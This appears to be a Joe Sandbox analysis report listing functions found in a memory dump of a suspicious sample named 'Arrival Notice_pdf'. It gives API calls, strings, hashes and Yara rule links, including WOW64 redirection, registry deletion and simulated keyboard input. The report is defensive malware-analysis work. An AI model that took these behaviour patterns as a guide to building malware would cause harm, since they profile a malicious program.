LoadLibraryA.KERNEL32(kernel32.dll,00000000,002442EC,?,002442AA,?), ref: 00244304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00244316

Strings

kernel32.dll, xrefs: 002442FF
Wow64RevertWow64FsRedirection, xrefs: 00244310

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 3fbedd6d0c7897f47ef7ff6456b0460a260abcb37f1275a09bb4fddb6d9071f0
Instruction ID: 23e469caf793c5cacf277f442d04c4d3e0a5926476bb26a7eaf5817de324079d
Opcode Fuzzy Hash: 3fbedd6d0c7897f47ef7ff6456b0460a260abcb37f1275a09bb4fddb6d9071f0
Instruction Fuzzy Hash: BCD0A7308607139FC7255F20FC0CB11BAD4AF05701B244479F545D2160D7F0C894C610

Function 0024434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,002441BB,00244341,?,0024422F,?,002441BB,?,?,?,?,002439FE,?,00000001), ref: 00244359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0024436B

Strings

kernel32.dll, xrefs: 00244354
Wow64DisableWow64FsRedirection, xrefs: 00244365

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 26ef135e1bd4dd5a2da99c94b0756d5d35aaf3b0c14b5b6c892740bc1db7eab1
Instruction ID: b77baabf8385f787efd6224b413744094b803e81f4529f2ab2659d9b03ef1903
Opcode Fuzzy Hash: 26ef135e1bd4dd5a2da99c94b0756d5d35aaf3b0c14b5b6c892740bc1db7eab1
Instruction Fuzzy Hash: 5AD0A730860B139FC7245F30FC0DF11BAD4AF11B15B24C479E485D2150D7F0D894C610

Function 00280539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0028051D,?,002805FE), ref: 00280547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00280559

Strings

RegisterTypeLibForUser, xrefs: 00280553
oleaut32.dll, xrefs: 00280542

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 340455e0ae0c3a63e3830874aa20b7a862e77476abf0b4b32e6525e45f82bb8e
Instruction ID: 95f03266a7596d0772d7864cbbec713b41798c17cde89a0abb999150cf4d0c6a
Opcode Fuzzy Hash: 340455e0ae0c3a63e3830874aa20b7a862e77476abf0b4b32e6525e45f82bb8e
Instruction Fuzzy Hash: EBD05E344707139EC7209F60AC48A11B7A4AB02301B548439E45A92591D6B4C8988B20

Function 00280564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0028052F,?,002806D7), ref: 00280572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00280584

Strings

UnRegisterTypeLibForUser, xrefs: 0028057E
oleaut32.dll, xrefs: 0028056D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 81beb7444584253753cd17cbd7285b8008f373b86a8fed65db74576d1b50fb35
Instruction ID: 764ffe05afab3ccf3cc1a29c03f7fbfa05687d5d114cfb88a432294d4acaab82
Opcode Fuzzy Hash: 81beb7444584253753cd17cbd7285b8008f373b86a8fed65db74576d1b50fb35
Instruction Fuzzy Hash: 3DD05E344213179EC7206F20A848A12B7E4AB06300B548539E94592994D6B4C4988B20

Function 0029ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0029ECBE,?,0029EBBB), ref: 0029ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0029ECE8

Strings

kernel32.dll, xrefs: 0029ECD1
GetSystemWow64DirectoryW, xrefs: 0029ECE2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: d30e17b973778a8e7d235e089edcd0665a6acc6b037954bf9e61fe32e7f4f663
Instruction ID: 7a84b9f36b8b688f98437bc6add674be6702186784fbe144555fc4589def666b
Opcode Fuzzy Hash: d30e17b973778a8e7d235e089edcd0665a6acc6b037954bf9e61fe32e7f4f663
Instruction Fuzzy Hash: 7AD0A7308207239FCF209F60FC4CA12B6E4AF01340B15883AF889D2150DBF0D894C610

Function 0029BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0029BAD3,00000001,0029B6EE,?,002DDC00), ref: 0029BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0029BAFD

Strings

kernel32.dll, xrefs: 0029BAE6
GetModuleHandleExW, xrefs: 0029BAF7

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: b1559dc0da3b30a3bf642f36d3af8d583a6661b1ac4d49fea62ae2eb6c832e0c
Instruction ID: 985dd563872079ae9877e24f7cccd042aa9da965e37f60f82a58d9d96f6dcb4c
Opcode Fuzzy Hash: b1559dc0da3b30a3bf642f36d3af8d583a6661b1ac4d49fea62ae2eb6c832e0c
Instruction Fuzzy Hash: 13D05E308207139FCB315F20B848A22B6D4AB01344B144439A947D2194EBB0D894C610

Function 002A3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,002A3BD1,?,002A3E06), ref: 002A3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002A3BFB

Strings

advapi32.dll, xrefs: 002A3BE4
RegDeleteKeyExW, xrefs: 002A3BF5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 24601b00d50372500f942924cc1ba1437a3752a02bfe6dfc4154e5df0eb3cf96
Instruction ID: ec1531143f7ee5bdb97597cb2d85c86f2ce7a0a195e2ea52a173bb16143f538d
Opcode Fuzzy Hash: 24601b00d50372500f942924cc1ba1437a3752a02bfe6dfc4154e5df0eb3cf96
Instruction Fuzzy Hash: 58D05E704207169FC720AF60AC09A13BAB8AB03324B14443AE449E2150DAF0C4908A10

Function 00279B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d3534e2d32965dda3afdf6e63e859153e3e3ef49040f60576c77564ab30536
Instruction ID: 81449d0c556e4fae05473847d13da75b4b6d86eb5ce32558a6011351e30023c5
Opcode Fuzzy Hash: e2d3534e2d32965dda3afdf6e63e859153e3e3ef49040f60576c77564ab30536
Instruction Fuzzy Hash: 33C16B75A2021AEFDF14DF94C884EAEB7B5FF48700F108599E909AB251D770EE91CB90

Function 0029AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0029AAB4
CoUninitialize.OLE32 ref: 0029AABF

Part of subcall function 00280213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0028027B

VariantInit.OLEAUT32(?), ref: 0029AACA
VariantClear.OLEAUT32(?), ref: 0029AD9D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: e38cf1e3eb7efc7934ef181f315cfa161e15b64f711b204e3448e159268bb57e
Instruction ID: 507bec27b9c01e120832dcd87b009c5e8b80acb17900dbc1fe97efc6944319c3
Opcode Fuzzy Hash: e38cf1e3eb7efc7934ef181f315cfa161e15b64f711b204e3448e159268bb57e
Instruction Fuzzy Hash: D9A169352247019FDB14EF14C491B1AB7E4BF89B10F148449FA9A9B3A2CB70ED64CF96

Function 002791CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002791DD
SysAllocString.OLEAUT32(?), ref: 00279286
VariantCopy.OLEAUT32 ref: 002792B5
VariantClear.OLEAUT32(?), ref: 002792DC

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 46adff21e504915e810627230cccaa46bf3a4faf4e8245dc71cf3d80091f5bb6
Instruction ID: c691aa20eb1998c2a8436b31400f9c2cfde77e4f839cdd7ed55c36c594fcc79e
Opcode Fuzzy Hash: 46adff21e504915e810627230cccaa46bf3a4faf4e8245dc71cf3d80091f5bb6
Instruction Fuzzy Hash: 265171346347069BDB24AF69D495B2EB3A9EF45314F20C85FE54ECB2D1DB7098E08B05

Function 0026365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 002636B7
_memcpy_s.LIBCMT ref: 00263729
__filbuf.LIBCMT ref: 002637AA
_memset.LIBCMT ref: 002637EE

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 4815de4d5a6f7a3e1f8e451bb44c09def84d22bffa1aa2b57a6c31a680500bd1
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: A651A7B4A20206ABDB25CF69C88466EB7A5AF40320F248729F835972D0D7719FF09F54

Function 002AC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00CE6908,?), ref: 002AC544
ScreenToClient.USER32(?,00000002), ref: 002AC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 002AC5DA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: f3b6f3a556ec1c7c5abbc38d2655afdbdbe17fd687ebd589aec706d2f0db9938
Instruction ID: 138ca60691b66aae3e56cfaaf28b4b7466908f0479977c7e9fe4d6875669e780
Opcode Fuzzy Hash: f3b6f3a556ec1c7c5abbc38d2655afdbdbe17fd687ebd589aec706d2f0db9938
Instruction Fuzzy Hash: 4E516175910209EFCF10DF68D8809AE7BB9FF56720F608259F965AB290DB30ED51CB90

Function 0027C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0027C462
__itow.LIBCMT ref: 0027C49C

Part of subcall function 0027C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0027C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0027C505
__itow.LIBCMT ref: 0027C55A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 714261ede299a2371c57731dc27b1e68897c165453b6b5bda97453fbbba40273
Instruction ID: 22140f216246299aefcd7796dd0d70b29d791a8022ea68be8938cadd9d34972e
Opcode Fuzzy Hash: 714261ede299a2371c57731dc27b1e68897c165453b6b5bda97453fbbba40273
Instruction Fuzzy Hash: 5041F771A10209AFDF25DF64C851FEE7BB9AF49700F104029FA09B3282DB709A65CF91

Function 0028390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00283966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00283982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002839EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00283A4D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: df762851d84949b86bde27e395bc96d3085288c4695dc90c88386916204d599e
Instruction ID: 023f66c607739f6dadd63238d8be84704a056b6528bd5e192cebbe509317bbb3
Opcode Fuzzy Hash: df762851d84949b86bde27e395bc96d3085288c4695dc90c88386916204d599e
Instruction Fuzzy Hash: 63412C78A26248AEEF34EF64C809BFDBBB5AB45710F04011AF4C1921C1C7F49EA5DB65

Function 0028E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0028E742
GetLastError.KERNEL32(?,00000000), ref: 0028E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0028E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0028E7B9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 969afe24d975a8c89cb3d6612732b27a3cc03306132cb127218f4b058b586144
Instruction ID: 7e37349e7b3b56a9976078b5ba57f6fd4451aeaee528eaab85c6d71e2e4bd415
Opcode Fuzzy Hash: 969afe24d975a8c89cb3d6612732b27a3cc03306132cb127218f4b058b586144
Instruction Fuzzy Hash: 8A412339210611DFCF15EF14C444A4EBBE5BF9AB20B098498E946AB3A2CB70FD50CF95

Function 002AB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002AB5D1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 219999bb282284df9f406f659cc784125d0870f8580f29b432e5949d5ecd0811
Instruction ID: 44f5e59c426bbffe78e301d97196822526ab30e5332028d47a9a73c8d3f3eb4b
Opcode Fuzzy Hash: 219999bb282284df9f406f659cc784125d0870f8580f29b432e5949d5ecd0811
Instruction Fuzzy Hash: A631B474A21205AFEB268F28DC99FA87769EB07710F944112FA51D61E3CF70A970CB51

Function 002AD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 002AD807
GetWindowRect.USER32(?,?), ref: 002AD87D
PtInRect.USER32(?,?,002AED5A), ref: 002AD88D
MessageBeep.USER32(00000000), ref: 002AD8FE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0591468edea9d73761d433a03490f9bef5f529f3be00f2ca8f3538c4f85a5753
Instruction ID: f40cab9f174f75785d19c792ff2c4a7ccd3f3d07a834cf3a4df0738e557a1bcc
Opcode Fuzzy Hash: 0591468edea9d73761d433a03490f9bef5f529f3be00f2ca8f3538c4f85a5753
Instruction Fuzzy Hash: DB41B070A10219DFCB12DF58D884FA97BF5FF4A311F1881AAE8168B660DB35E952CF40

Function 00283A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00283AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00283AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00283B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00283B92

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9a16e0ec0a3c1d3d72ec44fca76c79856dba2582e694dc6586b42f70782e7a91
Instruction ID: ba99b4f8db8b0a2b293e502afe835b96d436d712d1d666813856adb261451ae6
Opcode Fuzzy Hash: 9a16e0ec0a3c1d3d72ec44fca76c79856dba2582e694dc6586b42f70782e7a91
Instruction Fuzzy Hash: B33168B8922249AEEF30FF64C819BFE7BA5AB45718F04011AE481932D1C7748F65C765

Function 00274004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00274038
__isleadbyte_l.LIBCMT ref: 00274066
